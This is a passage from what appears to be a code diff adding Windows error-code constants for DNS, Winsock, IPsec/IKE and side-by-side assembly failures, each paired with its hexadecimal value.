+DNS_ERROR_INVALID_SIGNATURE_VALIDITY_PERIOD = 0x000023a3
+DNS_ERROR_INVALID_NSEC3_ITERATION_COUNT = 0x000023a4
+DNS_ERROR_DNSSEC_IS_DISABLED = 0x000023a5
+DNS_ERROR_INVALID_XML = 0x000023a6
+DNS_ERROR_NO_VALID_TRUST_ANCHORS = 0x000023a7
+DNS_ERROR_ROLLOVER_NOT_POKEABLE = 0x000023a8
+DNS_ERROR_NSEC3_NAME_COLLISION = 0x000023a9
+DNS_ERROR_NSEC_INCOMPATIBLE_WITH_NSEC3_RSA_SHA1 = 0x000023aa
+DNS_INFO_NO_RECORDS = 0x0000251d
+DNS_ERROR_BAD_PACKET = 0x0000251e
+DNS_ERROR_NO_PACKET = 0x0000251f
+DNS_ERROR_RCODE = 0x00002520
+DNS_ERROR_UNSECURE_PACKET = 0x00002521
+DNS_REQUEST_PENDING = 0x00002522
+DNS_ERROR_INVALID_TYPE = 0x0000254f
+DNS_ERROR_INVALID_IP_ADDRESS = 0x00002550
+DNS_ERROR_INVALID_PROPERTY = 0x00002551
+DNS_ERROR_TRY_AGAIN_LATER = 0x00002552
+DNS_ERROR_NOT_UNIQUE = 0x00002553
+DNS_ERROR_NON_RFC_NAME = 0x00002554
+DNS_STATUS_FQDN = 0x00002555
+DNS_STATUS_DOTTED_NAME = 0x00002556
+DNS_STATUS_SINGLE_PART_NAME = 0x00002557
+DNS_ERROR_INVALID_NAME_CHAR = 0x00002558
+DNS_ERROR_NUMERIC_NAME = 0x00002559
+DNS_ERROR_NOT_ALLOWED_ON_ROOT_SERVER = 0x0000255a
+DNS_ERROR_NOT_ALLOWED_UNDER_DELEGATION = 0x0000255b
+DNS_ERROR_CANNOT_FIND_ROOT_HINTS = 0x0000255c
+DNS_ERROR_INCONSISTENT_ROOT_HINTS = 0x0000255d
+DNS_ERROR_DWORD_VALUE_TOO_SMALL = 0x0000255e
+DNS_ERROR_DWORD_VALUE_TOO_LARGE = 0x0000255f
+DNS_ERROR_BACKGROUND_LOADING = 0x00002560
+DNS_ERROR_NOT_ALLOWED_ON_RODC = 0x00002561
+DNS_ERROR_NOT_ALLOWED_UNDER_DNAME = 0x00002562
+DNS_ERROR_DELEGATION_REQUIRED = 0x00002563
+DNS_ERROR_INVALID_POLICY_TABLE = 0x00002564
+DNS_ERROR_ZONE_DOES_NOT_EXIST = 0x00002581
+DNS_ERROR_NO_ZONE_INFO = 0x00002582
+DNS_ERROR_INVALID_ZONE_OPERATION = 0x00002583
+DNS_ERROR_ZONE_CONFIGURATION_ERROR = 0x00002584
+DNS_ERROR_ZONE_HAS_NO_SOA_RECORD = 0x00002585
+DNS_ERROR_ZONE_HAS_NO_NS_RECORDS = 0x00002586
+DNS_ERROR_ZONE_LOCKED = 0x00002587
+DNS_ERROR_ZONE_CREATION_FAILED = 0x00002588
+DNS_ERROR_ZONE_ALREADY_EXISTS = 0x00002589
+DNS_ERROR_AUTOZONE_ALREADY_EXISTS = 0x0000258a
+DNS_ERROR_INVALID_ZONE_TYPE = 0x0000258b
+DNS_ERROR_SECONDARY_REQUIRES_MASTER_IP = 0x0000258c
+DNS_ERROR_ZONE_NOT_SECONDARY = 0x0000258d
+DNS_ERROR_NEED_SECONDARY_ADDRESSES = 0x0000258e
+DNS_ERROR_WINS_INIT_FAILED = 0x0000258f
+DNS_ERROR_NEED_WINS_SERVERS = 0x00002590
+DNS_ERROR_NBSTAT_INIT_FAILED = 0x00002591
+DNS_ERROR_SOA_DELETE_INVALID = 0x00002592
+DNS_ERROR_FORWARDER_ALREADY_EXISTS = 0x00002593
+DNS_ERROR_ZONE_REQUIRES_MASTER_IP = 0x00002594
+DNS_ERROR_ZONE_IS_SHUTDOWN = 0x00002595
+DNS_ERROR_ZONE_LOCKED_FOR_SIGNING = 0x00002596
+DNS_ERROR_PRIMARY_REQUIRES_DATAFILE = 0x000025b3
+DNS_ERROR_INVALID_DATAFILE_NAME = 0x000025b4
+DNS_ERROR_DATAFILE_OPEN_FAILURE = 0x000025b5
+DNS_ERROR_FILE_WRITEBACK_FAILED = 0x000025b6
+DNS_ERROR_DATAFILE_PARSING = 0x000025b7
+DNS_ERROR_RECORD_DOES_NOT_EXIST = 0x000025e5
+DNS_ERROR_RECORD_FORMAT = 0x000025e6
+DNS_ERROR_NODE_CREATION_FAILED = 0x000025e7
+DNS_ERROR_UNKNOWN_RECORD_TYPE = 0x000025e8
+DNS_ERROR_RECORD_TIMED_OUT = 0x000025e9
+DNS_ERROR_NAME_NOT_IN_ZONE = 0x000025ea
+DNS_ERROR_CNAME_LOOP = 0x000025eb
+DNS_ERROR_NODE_IS_CNAME = 0x000025ec
+DNS_ERROR_CNAME_COLLISION = 0x000025ed
+DNS_ERROR_RECORD_ONLY_AT_ZONE_ROOT = 0x000025ee
+DNS_ERROR_RECORD_ALREADY_EXISTS = 0x000025ef
+DNS_ERROR_SECONDARY_DATA = 0x000025f0
+DNS_ERROR_NO_CREATE_CACHE_DATA = 0x000025f1
+DNS_ERROR_NAME_DOES_NOT_EXIST = 0x000025f2
+DNS_WARNING_PTR_CREATE_FAILED = 0x000025f3
+DNS_WARNING_DOMAIN_UNDELETED = 0x000025f4
+DNS_ERROR_DS_UNAVAILABLE = 0x000025f5
+DNS_ERROR_DS_ZONE_ALREADY_EXISTS = 0x000025f6
+DNS_ERROR_NO_BOOTFILE_IF_DS_ZONE = 0x000025f7
+DNS_ERROR_NODE_IS_DNAME = 0x000025f8
+DNS_ERROR_DNAME_COLLISION = 0x000025f9
+DNS_ERROR_ALIAS_LOOP = 0x000025fa
+DNS_INFO_AXFR_COMPLETE = 0x00002617
+DNS_ERROR_AXFR = 0x00002618
+DNS_INFO_ADDED_LOCAL_WINS = 0x00002619
+DNS_STATUS_CONTINUE_NEEDED = 0x00002649
+DNS_ERROR_NO_TCPIP = 0x0000267b
+DNS_ERROR_NO_DNS_SERVERS = 0x0000267c
+DNS_ERROR_DP_DOES_NOT_EXIST = 0x000026ad
+DNS_ERROR_DP_ALREADY_EXISTS = 0x000026ae
+DNS_ERROR_DP_NOT_ENLISTED = 0x000026af
+DNS_ERROR_DP_ALREADY_ENLISTED = 0x000026b0
+DNS_ERROR_DP_NOT_AVAILABLE = 0x000026b1
+DNS_ERROR_DP_FSMO_ERROR = 0x000026b2
+WSAEINTR = 0x00002714
+WSAEBADF = 0x00002719
+WSAEACCES = 0x0000271d
+WSAEFAULT = 0x0000271e
+WSAEINVAL = 0x00002726
+WSAEMFILE = 0x00002728
+WSAEWOULDBLOCK = 0x00002733
+WSAEINPROGRESS = 0x00002734
+WSAEALREADY = 0x00002735
+WSAENOTSOCK = 0x00002736
+WSAEDESTADDRREQ = 0x00002737
+WSAEMSGSIZE = 0x00002738
+WSAEPROTOTYPE = 0x00002739
+WSAENOPROTOOPT = 0x0000273a
+WSAEPROTONOSUPPORT = 0x0000273b
+WSAESOCKTNOSUPPORT = 0x0000273c
+WSAEOPNOTSUPP = 0x0000273d
+WSAEPFNOSUPPORT = 0x0000273e
+WSAEAFNOSUPPORT = 0x0000273f
+WSAEADDRINUSE = 0x00002740
+WSAEADDRNOTAVAIL = 0x00002741
+WSAENETDOWN = 0x00002742
+WSAENETUNREACH = 0x00002743
+WSAENETRESET = 0x00002744
+WSAECONNABORTED = 0x00002745
+WSAECONNRESET = 0x00002746
+WSAENOBUFS = 0x00002747
+WSAEISCONN = 0x00002748
+WSAENOTCONN = 0x00002749
+WSAESHUTDOWN = 0x0000274a
+WSAETOOMANYREFS = 0x0000274b
+WSAETIMEDOUT = 0x0000274c
+WSAECONNREFUSED = 0x0000274d
+WSAELOOP = 0x0000274e
+WSAENAMETOOLONG = 0x0000274f
+WSAEHOSTDOWN = 0x00002750
+WSAEHOSTUNREACH = 0x00002751
+WSAENOTEMPTY = 0x00002752
+WSAEPROCLIM = 0x00002753
+WSAEUSERS = 0x00002754
+WSAEDQUOT = 0x00002755
+WSAESTALE = 0x00002756
+WSAEREMOTE = 0x00002757
+WSASYSNOTREADY = 0x0000276b
+WSAVERNOTSUPPORTED = 0x0000276c
+WSANOTINITIALISED = 0x0000276d
+WSAEDISCON = 0x00002775
+WSAENOMORE = 0x00002776
+WSAECANCELLED = 0x00002777
+WSAEINVALIDPROCTABLE = 0x00002778
+WSAEINVALIDPROVIDER = 0x00002779
+WSAEPROVIDERFAILEDINIT = 0x0000277a
+WSASYSCALLFAILURE = 0x0000277b
+WSASERVICE_NOT_FOUND = 0x0000277c
+WSATYPE_NOT_FOUND = 0x0000277d
+WSA_E_NO_MORE = 0x0000277e
+WSA_E_CANCELLED = 0x0000277f
+WSAEREFUSED = 0x00002780
+WSAHOST_NOT_FOUND = 0x00002af9
+WSATRY_AGAIN = 0x00002afa
+WSANO_RECOVERY = 0x00002afb
+WSANO_DATA = 0x00002afc
+WSA_QOS_RECEIVERS = 0x00002afd
+WSA_QOS_SENDERS = 0x00002afe
+WSA_QOS_NO_SENDERS = 0x00002aff
+WSA_QOS_NO_RECEIVERS = 0x00002b00
+WSA_QOS_REQUEST_CONFIRMED = 0x00002b01
+WSA_QOS_ADMISSION_FAILURE = 0x00002b02
+WSA_QOS_POLICY_FAILURE = 0x00002b03
+WSA_QOS_BAD_STYLE = 0x00002b04
+WSA_QOS_BAD_OBJECT = 0x00002b05
+WSA_QOS_TRAFFIC_CTRL_ERROR = 0x00002b06
+WSA_QOS_GENERIC_ERROR = 0x00002b07
+WSA_QOS_ESERVICETYPE = 0x00002b08
+WSA_QOS_EFLOWSPEC = 0x00002b09
+WSA_QOS_EPROVSPECBUF = 0x00002b0a
+WSA_QOS_EFILTERSTYLE = 0x00002b0b
+WSA_QOS_EFILTERTYPE = 0x00002b0c
+WSA_QOS_EFILTERCOUNT = 0x00002b0d
+WSA_QOS_EOBJLENGTH = 0x00002b0e
+WSA_QOS_EFLOWCOUNT = 0x00002b0f
+WSA_QOS_EUNKOWNPSOBJ = 0x00002b10
+WSA_QOS_EPOLICYOBJ = 0x00002b11
+WSA_QOS_EFLOWDESC = 0x00002b12
+WSA_QOS_EPSFLOWSPEC = 0x00002b13
+WSA_QOS_EPSFILTERSPEC = 0x00002b14
+WSA_QOS_ESDMODEOBJ = 0x00002b15
+WSA_QOS_ESHAPERATEOBJ = 0x00002b16
+WSA_QOS_RESERVED_PETYPE = 0x00002b17
+WSA_SECURE_HOST_NOT_FOUND = 0x00002b18
+WSA_IPSEC_NAME_POLICY_ERROR = 0x00002b19
+ERROR_IPSEC_QM_POLICY_EXISTS = 0x000032c8
+ERROR_IPSEC_QM_POLICY_NOT_FOUND = 0x000032c9
+ERROR_IPSEC_QM_POLICY_IN_USE = 0x000032ca
+ERROR_IPSEC_MM_POLICY_EXISTS = 0x000032cb
+ERROR_IPSEC_MM_POLICY_NOT_FOUND = 0x000032cc
+ERROR_IPSEC_MM_POLICY_IN_USE = 0x000032cd
+ERROR_IPSEC_MM_FILTER_EXISTS = 0x000032ce
+ERROR_IPSEC_MM_FILTER_NOT_FOUND = 0x000032cf
+ERROR_IPSEC_TRANSPORT_FILTER_EXISTS = 0x000032d0
+ERROR_IPSEC_TRANSPORT_FILTER_NOT_FOUND = 0x000032d1
+ERROR_IPSEC_MM_AUTH_EXISTS = 0x000032d2
+ERROR_IPSEC_MM_AUTH_NOT_FOUND = 0x000032d3
+ERROR_IPSEC_MM_AUTH_IN_USE = 0x000032d4
+ERROR_IPSEC_DEFAULT_MM_POLICY_NOT_FOUND = 0x000032d5
+ERROR_IPSEC_DEFAULT_MM_AUTH_NOT_FOUND = 0x000032d6
+ERROR_IPSEC_DEFAULT_QM_POLICY_NOT_FOUND = 0x000032d7
+ERROR_IPSEC_TUNNEL_FILTER_EXISTS = 0x000032d8
+ERROR_IPSEC_TUNNEL_FILTER_NOT_FOUND = 0x000032d9
+ERROR_IPSEC_MM_FILTER_PENDING_DELETION = 0x000032da
+ERROR_IPSEC_TRANSPORT_FILTER_PENDING_DELETION = 0x000032db
+ERROR_IPSEC_TUNNEL_FILTER_PENDING_DELETION = 0x000032dc
+ERROR_IPSEC_MM_POLICY_PENDING_DELETION = 0x000032dd
+ERROR_IPSEC_MM_AUTH_PENDING_DELETION = 0x000032de
+ERROR_IPSEC_QM_POLICY_PENDING_DELETION = 0x000032df
+WARNING_IPSEC_MM_POLICY_PRUNED = 0x000032e0
+WARNING_IPSEC_QM_POLICY_PRUNED = 0x000032e1
+ERROR_IPSEC_IKE_NEG_STATUS_BEGIN = 0x000035e8
+ERROR_IPSEC_IKE_AUTH_FAIL = 0x000035e9
+ERROR_IPSEC_IKE_ATTRIB_FAIL = 0x000035ea
+ERROR_IPSEC_IKE_NEGOTIATION_PENDING = 0x000035eb
+ERROR_IPSEC_IKE_GENERAL_PROCESSING_ERROR = 0x000035ec
+ERROR_IPSEC_IKE_TIMED_OUT = 0x000035ed
+ERROR_IPSEC_IKE_NO_CERT = 0x000035ee
+ERROR_IPSEC_IKE_SA_DELETED = 0x000035ef
+ERROR_IPSEC_IKE_SA_REAPED = 0x000035f0
+ERROR_IPSEC_IKE_MM_ACQUIRE_DROP = 0x000035f1
+ERROR_IPSEC_IKE_QM_ACQUIRE_DROP = 0x000035f2
+ERROR_IPSEC_IKE_QUEUE_DROP_MM = 0x000035f3
+ERROR_IPSEC_IKE_QUEUE_DROP_NO_MM = 0x000035f4
+ERROR_IPSEC_IKE_DROP_NO_RESPONSE = 0x000035f5
+ERROR_IPSEC_IKE_MM_DELAY_DROP = 0x000035f6
+ERROR_IPSEC_IKE_QM_DELAY_DROP = 0x000035f7
+ERROR_IPSEC_IKE_ERROR = 0x000035f8
+ERROR_IPSEC_IKE_CRL_FAILED = 0x000035f9
+ERROR_IPSEC_IKE_INVALID_KEY_USAGE = 0x000035fa
+ERROR_IPSEC_IKE_INVALID_CERT_TYPE = 0x000035fb
+ERROR_IPSEC_IKE_NO_PRIVATE_KEY = 0x000035fc
+ERROR_IPSEC_IKE_SIMULTANEOUS_REKEY = 0x000035fd
+ERROR_IPSEC_IKE_DH_FAIL = 0x000035fe
+ERROR_IPSEC_IKE_CRITICAL_PAYLOAD_NOT_RECOGNIZED = 0x000035ff
+ERROR_IPSEC_IKE_INVALID_HEADER = 0x00003600
+ERROR_IPSEC_IKE_NO_POLICY = 0x00003601
+ERROR_IPSEC_IKE_INVALID_SIGNATURE = 0x00003602
+ERROR_IPSEC_IKE_KERBEROS_ERROR = 0x00003603
+ERROR_IPSEC_IKE_NO_PUBLIC_KEY = 0x00003604
+ERROR_IPSEC_IKE_PROCESS_ERR = 0x00003605
+ERROR_IPSEC_IKE_PROCESS_ERR_SA = 0x00003606
+ERROR_IPSEC_IKE_PROCESS_ERR_PROP = 0x00003607
+ERROR_IPSEC_IKE_PROCESS_ERR_TRANS = 0x00003608
+ERROR_IPSEC_IKE_PROCESS_ERR_KE = 0x00003609
+ERROR_IPSEC_IKE_PROCESS_ERR_ID = 0x0000360a
+ERROR_IPSEC_IKE_PROCESS_ERR_CERT = 0x0000360b
+ERROR_IPSEC_IKE_PROCESS_ERR_CERT_REQ = 0x0000360c
+ERROR_IPSEC_IKE_PROCESS_ERR_HASH = 0x0000360d
+ERROR_IPSEC_IKE_PROCESS_ERR_SIG = 0x0000360e
+ERROR_IPSEC_IKE_PROCESS_ERR_NONCE = 0x0000360f
+ERROR_IPSEC_IKE_PROCESS_ERR_NOTIFY = 0x00003610
+ERROR_IPSEC_IKE_PROCESS_ERR_DELETE = 0x00003611
+ERROR_IPSEC_IKE_PROCESS_ERR_VENDOR = 0x00003612
+ERROR_IPSEC_IKE_INVALID_PAYLOAD = 0x00003613
+ERROR_IPSEC_IKE_LOAD_SOFT_SA = 0x00003614
+ERROR_IPSEC_IKE_SOFT_SA_TORN_DOWN = 0x00003615
+ERROR_IPSEC_IKE_INVALID_COOKIE = 0x00003616
+ERROR_IPSEC_IKE_NO_PEER_CERT = 0x00003617
+ERROR_IPSEC_IKE_PEER_CRL_FAILED = 0x00003618
+ERROR_IPSEC_IKE_POLICY_CHANGE = 0x00003619
+ERROR_IPSEC_IKE_NO_MM_POLICY = 0x0000361a
+ERROR_IPSEC_IKE_NOTCBPRIV = 0x0000361b
+ERROR_IPSEC_IKE_SECLOADFAIL = 0x0000361c
+ERROR_IPSEC_IKE_FAILSSPINIT = 0x0000361d
+ERROR_IPSEC_IKE_FAILQUERYSSP = 0x0000361e
+ERROR_IPSEC_IKE_SRVACQFAIL = 0x0000361f
+ERROR_IPSEC_IKE_SRVQUERYCRED = 0x00003620
+ERROR_IPSEC_IKE_GETSPIFAIL = 0x00003621
+ERROR_IPSEC_IKE_INVALID_FILTER = 0x00003622
+ERROR_IPSEC_IKE_OUT_OF_MEMORY = 0x00003623
+ERROR_IPSEC_IKE_ADD_UPDATE_KEY_FAILED = 0x00003624
+ERROR_IPSEC_IKE_INVALID_POLICY = 0x00003625
+ERROR_IPSEC_IKE_UNKNOWN_DOI = 0x00003626
+ERROR_IPSEC_IKE_INVALID_SITUATION = 0x00003627
+ERROR_IPSEC_IKE_DH_FAILURE = 0x00003628
+ERROR_IPSEC_IKE_INVALID_GROUP = 0x00003629
+ERROR_IPSEC_IKE_ENCRYPT = 0x0000362a
+ERROR_IPSEC_IKE_DECRYPT = 0x0000362b
+ERROR_IPSEC_IKE_POLICY_MATCH = 0x0000362c
+ERROR_IPSEC_IKE_UNSUPPORTED_ID = 0x0000362d
+ERROR_IPSEC_IKE_INVALID_HASH = 0x0000362e
+ERROR_IPSEC_IKE_INVALID_HASH_ALG = 0x0000362f
+ERROR_IPSEC_IKE_INVALID_HASH_SIZE = 0x00003630
+ERROR_IPSEC_IKE_INVALID_ENCRYPT_ALG = 0x00003631
+ERROR_IPSEC_IKE_INVALID_AUTH_ALG = 0x00003632
+ERROR_IPSEC_IKE_INVALID_SIG = 0x00003633
+ERROR_IPSEC_IKE_LOAD_FAILED = 0x00003634
+ERROR_IPSEC_IKE_RPC_DELETE = 0x00003635
+ERROR_IPSEC_IKE_BENIGN_REINIT = 0x00003636
+ERROR_IPSEC_IKE_INVALID_RESPONDER_LIFETIME_NOTIFY = 0x00003637
+ERROR_IPSEC_IKE_INVALID_MAJOR_VERSION = 0x00003638
+ERROR_IPSEC_IKE_INVALID_CERT_KEYLEN = 0x00003639
+ERROR_IPSEC_IKE_MM_LIMIT = 0x0000363a
+ERROR_IPSEC_IKE_NEGOTIATION_DISABLED = 0x0000363b
+ERROR_IPSEC_IKE_QM_LIMIT = 0x0000363c
+ERROR_IPSEC_IKE_MM_EXPIRED = 0x0000363d
+ERROR_IPSEC_IKE_PEER_MM_ASSUMED_INVALID = 0x0000363e
+ERROR_IPSEC_IKE_CERT_CHAIN_POLICY_MISMATCH = 0x0000363f
+ERROR_IPSEC_IKE_UNEXPECTED_MESSAGE_ID = 0x00003640
+ERROR_IPSEC_IKE_INVALID_AUTH_PAYLOAD = 0x00003641
+ERROR_IPSEC_IKE_DOS_COOKIE_SENT = 0x00003642
+ERROR_IPSEC_IKE_SHUTTING_DOWN = 0x00003643
+ERROR_IPSEC_IKE_CGA_AUTH_FAILED = 0x00003644
+ERROR_IPSEC_IKE_PROCESS_ERR_NATOA = 0x00003645
+ERROR_IPSEC_IKE_INVALID_MM_FOR_QM = 0x00003646
+ERROR_IPSEC_IKE_QM_EXPIRED = 0x00003647
+ERROR_IPSEC_IKE_TOO_MANY_FILTERS = 0x00003648
+ERROR_IPSEC_IKE_NEG_STATUS_END = 0x00003649
+ERROR_IPSEC_IKE_KILL_DUMMY_NAP_TUNNEL = 0x0000364a
+ERROR_IPSEC_IKE_INNER_IP_ASSIGNMENT_FAILURE = 0x0000364b
+ERROR_IPSEC_IKE_REQUIRE_CP_PAYLOAD_MISSING = 0x0000364c
+ERROR_IPSEC_KEY_MODULE_IMPERSONATION_NEGOTIATION_PENDING = 0x0000364d
+ERROR_IPSEC_IKE_COEXISTENCE_SUPPRESS = 0x0000364e
+ERROR_IPSEC_IKE_RATELIMIT_DROP = 0x0000364f
+ERROR_IPSEC_IKE_PEER_DOESNT_SUPPORT_MOBIKE = 0x00003650
+ERROR_IPSEC_IKE_AUTHORIZATION_FAILURE = 0x00003651
+ERROR_IPSEC_IKE_STRONG_CRED_AUTHORIZATION_FAILURE = 0x00003652
+ERROR_IPSEC_IKE_AUTHORIZATION_FAILURE_WITH_OPTIONAL_RETRY = 0x00003653
+ERROR_IPSEC_IKE_STRONG_CRED_AUTHORIZATION_AND_CERTMAP_FAILURE = 0x00003654
+ERROR_IPSEC_IKE_NEG_STATUS_EXTENDED_END = 0x00003655
+ERROR_IPSEC_BAD_SPI = 0x00003656
+ERROR_IPSEC_SA_LIFETIME_EXPIRED = 0x00003657
+ERROR_IPSEC_WRONG_SA = 0x00003658
+ERROR_IPSEC_REPLAY_CHECK_FAILED = 0x00003659
+ERROR_IPSEC_INVALID_PACKET = 0x0000365a
+ERROR_IPSEC_INTEGRITY_CHECK_FAILED = 0x0000365b
+ERROR_IPSEC_CLEAR_TEXT_DROP = 0x0000365c
+ERROR_IPSEC_AUTH_FIREWALL_DROP = 0x0000365d
+ERROR_IPSEC_THROTTLE_DROP = 0x0000365e
+ERROR_IPSEC_DOSP_BLOCK = 0x00003665
+ERROR_IPSEC_DOSP_RECEIVED_MULTICAST = 0x00003666
+ERROR_IPSEC_DOSP_INVALID_PACKET = 0x00003667
+ERROR_IPSEC_DOSP_STATE_LOOKUP_FAILED = 0x00003668
+ERROR_IPSEC_DOSP_MAX_ENTRIES = 0x00003669
+ERROR_IPSEC_DOSP_KEYMOD_NOT_ALLOWED = 0x0000366a
+ERROR_IPSEC_DOSP_NOT_INSTALLED = 0x0000366b
+ERROR_IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES = 0x0000366c
+ERROR_SXS_SECTION_NOT_FOUND = 0x000036b0
+ERROR_SXS_CANT_GEN_ACTCTX = 0x000036b1
+ERROR_SXS_INVALID_ACTCTXDATA_FORMAT = 0x000036b2
+ERROR_SXS_ASSEMBLY_NOT_FOUND = 0x000036b3
+ERROR_SXS_MANIFEST_FORMAT_ERROR = 0x000036b4
+ERROR_SXS_MANIFEST_PARSE_ERROR = 0x000036b5
+ERROR_SXS_ACTIVATION_CONTEXT_DISABLED = 0x000036b6
+ERROR_SXS_KEY_NOT_FOUND = 0x000036b7
+ERROR_SXS_VERSION_CONFLICT = 0x000036b8
+ERROR_SXS_WRONG_SECTION_TYPE = 0x000036b9
+ERROR_SXS_THREAD_QUERIES_DISABLED = 0x000036ba
+ERROR_SXS_PROCESS_DEFAULT_ALREADY_SET = 0x000036bb
+ERROR_SXS_UNKNOWN_ENCODING_GROUP = 0x000036bc
+ERROR_SXS_UNKNOWN_ENCODING = 0x000036bd
+ERROR_SXS_INVALID_XML_NAMESPACE_URI = 0x000036be
+ERROR_SXS_ROOT_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x000036bf
+ERROR_SXS_LEAF_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x000036c0
+ERROR_SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x000036c1
+ERROR_SXS_MANIFEST_MISSING_REQUIRED_DEFAULT_NAMESPACE = 0x000036c2
+ERROR_SXS_MANIFEST_INVALID_REQUIRED_DEFAULT_NAMESPACE = 0x000036c3
+ERROR_SXS_PRIVATE_MANIFEST_CROSS_PATH_WITH_REPARSE_POINT = 0x000036c4
+ERROR_SXS_DUPLICATE_DLL_NAME = 0x000036c5
+ERROR_SXS_DUPLICATE_WINDOWCLASS_NAME = 0x000036c6
+ERROR_SXS_DUPLICATE_CLSID = 0x000036c7
+ERROR_SXS_DUPLICATE_IID = 0x000036c8
+ERROR_SXS_DUPLICATE_TLBID = 0x000036c9
+ERROR_SXS_DUPLICATE_PROGID = 0x000036ca
+ERROR_SXS_DUPLICATE_ASSEMBLY_NAME = 0x000036cb
+ERROR_SXS_FILE_HASH_MISMATCH = 0x000036cc
+ERROR_SXS_POLICY_PARSE_ERROR = 0x000036cd
+ERROR_SXS_XML_E_MISSINGQUOTE = 0x000036ce
+ERROR_SXS_XML_E_COMMENTSYNTAX = 0x000036cf
+ERROR_SXS_XML_E_BADSTARTNAMECHAR = 0x000036d0
+ERROR_SXS_XML_E_BADNAMECHAR = 0x000036d1
+ERROR_SXS_XML_E_BADCHARINSTRING = 0x000036d2
+ERROR_SXS_XML_E_XMLDECLSYNTAX = 0x000036d3
+ERROR_SXS_XML_E_BADCHARDATA = 0x000036d4
+ERROR_SXS_XML_E_MISSINGWHITESPACE = 0x000036d5
+ERROR_SXS_XML_E_EXPECTINGTAGEND = 0x000036d6
+ERROR_SXS_XML_E_MISSINGSEMICOLON = 0x000036d7
+ERROR_SXS_XML_E_UNBALANCEDPAREN = 0x000036d8
+ERROR_SXS_XML_E_INTERNALERROR = 0x000036d9
+ERROR_SXS_XML_E_UNEXPECTED_WHITESPACE = 0x000036da
+ERROR_SXS_XML_E_INCOMPLETE_ENCODING = 0x000036db
+ERROR_SXS_XML_E_MISSING_PAREN = 0x000036dc
+ERROR_SXS_XML_E_EXPECTINGCLOSEQUOTE = 0x000036dd
+ERROR_SXS_XML_E_MULTIPLE_COLONS = 0x000036de
+ERROR_SXS_XML_E_INVALID_DECIMAL = 0x000036df
+ERROR_SXS_XML_E_INVALID_HEXIDECIMAL = 0x000036e0
+ERROR_SXS_XML_E_INVALID_UNICODE = 0x000036e1
+ERROR_SXS_XML_E_WHITESPACEORQUESTIONMARK = 0x000036e2
+ERROR_SXS_XML_E_UNEXPECTEDENDTAG = 0x000036e3
+ERROR_SXS_XML_E_UNCLOSEDTAG = 0x000036e4
+ERROR_SXS_XML_E_DUPLICATEATTRIBUTE = 0x000036e5
+ERROR_SXS_XML_E_MULTIPLEROOTS = 0x000036e6
+ERROR_SXS_XML_E_INVALIDATROOTLEVEL = 0x000036e7
+ERROR_SXS_XML_E_BADXMLDECL = 0x000036e8
+ERROR_SXS_XML_E_MISSINGROOT = 0x000036e9
+ERROR_SXS_XML_E_UNEXPECTEDEOF = 0x000036ea
+ERROR_SXS_XML_E_BADPEREFINSUBSET = 0x000036eb
+ERROR_SXS_XML_E_UNCLOSEDSTARTTAG = 0x000036ec
+ERROR_SXS_XML_E_UNCLOSEDENDTAG = 0x000036ed
+ERROR_SXS_XML_E_UNCLOSEDSTRING = 0x000036ee
+ERROR_SXS_XML_E_UNCLOSEDCOMMENT = 0x000036ef
+ERROR_SXS_XML_E_UNCLOSEDDECL = 0x000036f0
+ERROR_SXS_XML_E_UNCLOSEDCDATA = 0x000036f1
+ERROR_SXS_XML_E_RESERVEDNAMESPACE = 0x000036f2
+ERROR_SXS_XML_E_INVALIDENCODING = 0x000036f3
+ERROR_SXS_XML_E_INVALIDSWITCH = 0x000036f4
+ERROR_SXS_XML_E_BADXMLCASE = 0x000036f5
+ERROR_SXS_XML_E_INVALID_STANDALONE = 0x000036f6
+ERROR_SXS_XML_E_UNEXPECTED_STANDALONE = 0x000036f7
+ERROR_SXS_XML_E_INVALID_VERSION = 0x000036f8
+ERROR_SXS_XML_E_MISSINGEQUALS = 0x000036f9
+ERROR_SXS_PROTECTION_RECOVERY_FAILED = 0x000036fa
+ERROR_SXS_PROTECTION_PUBLIC_KEY_TOO_SHORT = 0x000036fb
+ERROR_SXS_PROTECTION_CATALOG_NOT_VALID = 0x000036fc
+ERROR_SXS_UNTRANSLATABLE_HRESULT = 0x000036fd
+ERROR_SXS_PROTECTION_CATALOG_FILE_MISSING = 0x000036fe
+ERROR_SXS_MISSING_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x000036ff
+ERROR_SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE_NAME = 0x00003700
+ERROR_SXS_ASSEMBLY_MISSING = 0x00003701
+ERROR_SXS_CORRUPT_ACTIVATION_STACK = 0x00003702
+ERROR_SXS_CORRUPTION = 0x00003703
+ERROR_SXS_EARLY_DEACTIVATION = 0x00003704
+ERROR_SXS_INVALID_DEACTIVATION = 0x00003705
+ERROR_SXS_MULTIPLE_DEACTIVATION = 0x00003706
+ERROR_SXS_PROCESS_TERMINATION_REQUESTED = 0x00003707
+ERROR_SXS_RELEASE_ACTIVATION_CONTEXT = 0x00003708
+ERROR_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY = 0x00003709
+ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE = 0x0000370a
+ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME = 0x0000370b
+ERROR_SXS_IDENTITY_DUPLICATE_ATTRIBUTE = 0x0000370c
+ERROR_SXS_IDENTITY_PARSE_ERROR = 0x0000370d
+ERROR_MALFORMED_SUBSTITUTION_STRING = 0x0000370e
+ERROR_SXS_INCORRECT_PUBLIC_KEY_TOKEN = 0x0000370f
+ERROR_UNMAPPED_SUBSTITUTION_STRING = 0x00003710
+ERROR_SXS_ASSEMBLY_NOT_LOCKED = 0x00003711
+ERROR_SXS_COMPONENT_STORE_CORRUPT = 0x00003712
+ERROR_ADVANCED_INSTALLER_FAILED = 0x00003713
+ERROR_XML_ENCODING_MISMATCH = 0x00003714
+ERROR_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT = 0x00003715
+ERROR_SXS_IDENTITIES_DIFFERENT = 0x00003716
+ERROR_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT = 0x00003717
+ERROR_SXS_FILE_NOT_PART_OF_ASSEMBLY = 0x00003718
+ERROR_SXS_MANIFEST_TOO_BIG = 0x00003719
+ERROR_SXS_SETTING_NOT_REGISTERED = 0x0000371a
+ERROR_SXS_TRANSACTION_CLOSURE_INCOMPLETE = 0x0000371b
